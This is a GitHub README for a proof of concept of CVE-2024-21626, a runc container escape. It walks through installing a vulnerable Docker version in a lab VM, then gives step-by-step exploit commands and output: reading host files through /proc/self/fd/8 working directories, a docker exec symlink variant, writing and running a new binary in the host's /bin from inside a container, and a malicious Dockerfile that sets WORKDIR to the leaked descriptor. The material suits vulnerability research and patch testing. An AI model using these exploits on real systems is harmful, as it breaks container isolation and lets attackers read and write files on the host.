Skip to content

Sk3pper/CVE-2024-21626

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

7 Commits

deb

deb

Β 
Β 

images

images

Β 
Β 

testOpenat2

testOpenat2

Β 
Β 

.gitignore

.gitignore

Β 
Β 

Dockerfile

Dockerfile

Β 
Β 

LICENSE

LICENSE

Β 
Β 

README.md

README.md

Β 
Β 

checkVulnerability.sh

checkVulnerability.sh

Β 
Β 

Repository files navigation

PoC of CVE-2024-21626

Read my full article for detailed explanation here.

Setup environment πŸ”¨

A. Download and install 22.04.1-Ubuntu LTS version

During the installation do not check the box to download update system.

B. Install guest additions CD image to easily work with the virtual machine

  • insert Guest additions CD image

  • open terminal in the mounted CD image

  • run the VBoxLinuxAdditions.run script

    demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run

C. Install the vulnerable docker version and related components

  • Set up Docker's apt repository

    # set up Docker's apt repository: add Docker's official GPG key:
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# add the repository to Apt sources:
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update

  • Find and install the right version of the different components (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin).

    # search in the cache reposiroty the docker-ce available packages
apt-cache madison docker-ce | awk '{ print $3 }'
# setup the chosen version
VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy

# search in the cache reposiroty the containerd.io and docker-buildx-plugin available packages
apt-cache madison containerd.io | awk '{ print $3 }'
apt-cache madison docker-buildx-plugin | awk '{ print $3 }'docker-buildx-plugin

# install the packages
sudo apt install docker-ce=$VERSION_STRING \
    docker-ce-cli=$VERSION_STRING \
    containerd.io=1.6.4-1 \
    docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy

If the packages are too old to find (see also the old repository online), or if you can't use Docker's apt repository to install Docker Engine, you can download the deb file for your release and install it manually. Go to https://download.docker.com/linux/ubuntu/dists/ or use the deb files inside the my GitHub repository and install them.

# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.deb

D. Check the installed versions

sudo docker version
runc --version    
containerd --version
uname -r

E. Check if the kernel is vulnerable

To work properly the vulnerability needs the presence of openat2 syscall. Manually checking with the following command:

grep openat2 /proc/kallsyms

There could be cases where it is necessary to check with the following golang script available in my GitHub repository if the openat2 syscall is present.

# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# run testOpenat2
cd testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.

The binary found was build with the following flags

env GOOS=linux GOARCH=amd64 go build testOpenat2.go

Verify if the target is vulnerable 🧐

Run checkVulnerability.sh and see if the file is printed in the the terminal

# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.sh

Attack 1 🦏

Exploit via Setting Working Directory to /proc/self/fd/

# run container with working directory to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

# read host filesystem files inside the container
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc

exploit via running a container

Attack 2 🐯

Exploit via docker exec:

Open one terminal and execute the following commands

# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar

Open another terminal and run the following command

# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120

Come back to the first terminal and access to the host path filesystem

# terminal 1: find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
.    irq   kmsg   kcore   mdstat   cpuinfo  sysvipc   softirqs  bootconfig  execdomains    sysrq-trigger      15
..   net   misc   locks   mounts   devices  version   zoneinfo  interrupts  filesystems    version_signature
fb   sys   mtrr   swaps   uptime   ioports  consoles  buddyinfo  kpagecount  kpagecgroup    self
fs   tty   scsi   asound  vmstat   loadavg  kallsyms  diskstats  kpageflags  vmallocinfo    thread-self
bus  acpi  stat   crypto  cgroups  meminfo  pressure  key-users  partitions  pagetypeinfo   1
dma  keys  iomem  driver  cmdline  modules  slabinfo  schedstat  timer_list  dynamic_debug  9
    
root@d98de5a852d7:/# cat /proc/9/cmdline 
sleep120

# read host filesystem files
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc

# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname 
d98de5a852d7

Exploit via execing into a running container

Attack 3a 🦁

# Attack 3a is attack 1 but adapted to overwrite a host binary

# run container with the working direcotry to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.# 

# write file in the host container
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF

# change chmod
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x  1 root root          40 mar  7 13:24 cve2024_21626

# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626 
Hello CVE-2024-21626

Exploit via execing into a running container

Attack 3b 🦍

# scenario 3b: host binary overwrite attack
# Attack 3b is attack 2 but adapted to overwrite a host binary

# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm

# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar

# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000

# terminal 1
# find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
.    irq   kmsg   kcore   mdstat   cpuinfo  sysvipc   softirqs  bootconfig  execdomains    sysrq-trigger      15
..   net   misc   locks   mounts   devices  version   zoneinfo  interrupts  filesystems    version_signature
fb   sys   mtrr   swaps   uptime   ioports  consoles  buddyinfo  kpagecount  kpagecgroup    self
fs   tty   scsi   asound  vmstat   loadavg  kallsyms  diskstats  kpageflags  vmallocinfo    thread-self
bus  acpi  stat   crypto  cgroups  meminfo  pressure  key-users  partitions  pagetypeinfo   1
dma  keys  iomem  driver  cmdline  modules  slabinfo  schedstat  timer_list  dynamic_debug  9

root@d98de5a852d7:/# cat /proc/9/cmdline 
sleep120

# write file in the host container
root@b6873018a7e8:.# cat > /proc/8/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF

# change chmod
root@b6873018a7e8:.# /proc/8/cwd/../../../../bin/chmod +x \
                     /proc/8/cwd/../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x  1 root root          40 mar  7 13:39 cve2024_21626

# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626 
Hello CVE-2024-21626

Attack with malicious image 🐳

Given the followinf Dockerfile

FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8

Build and run the image

sudo docker  build . -t devil-image

sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc

Exploit via malicious image

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages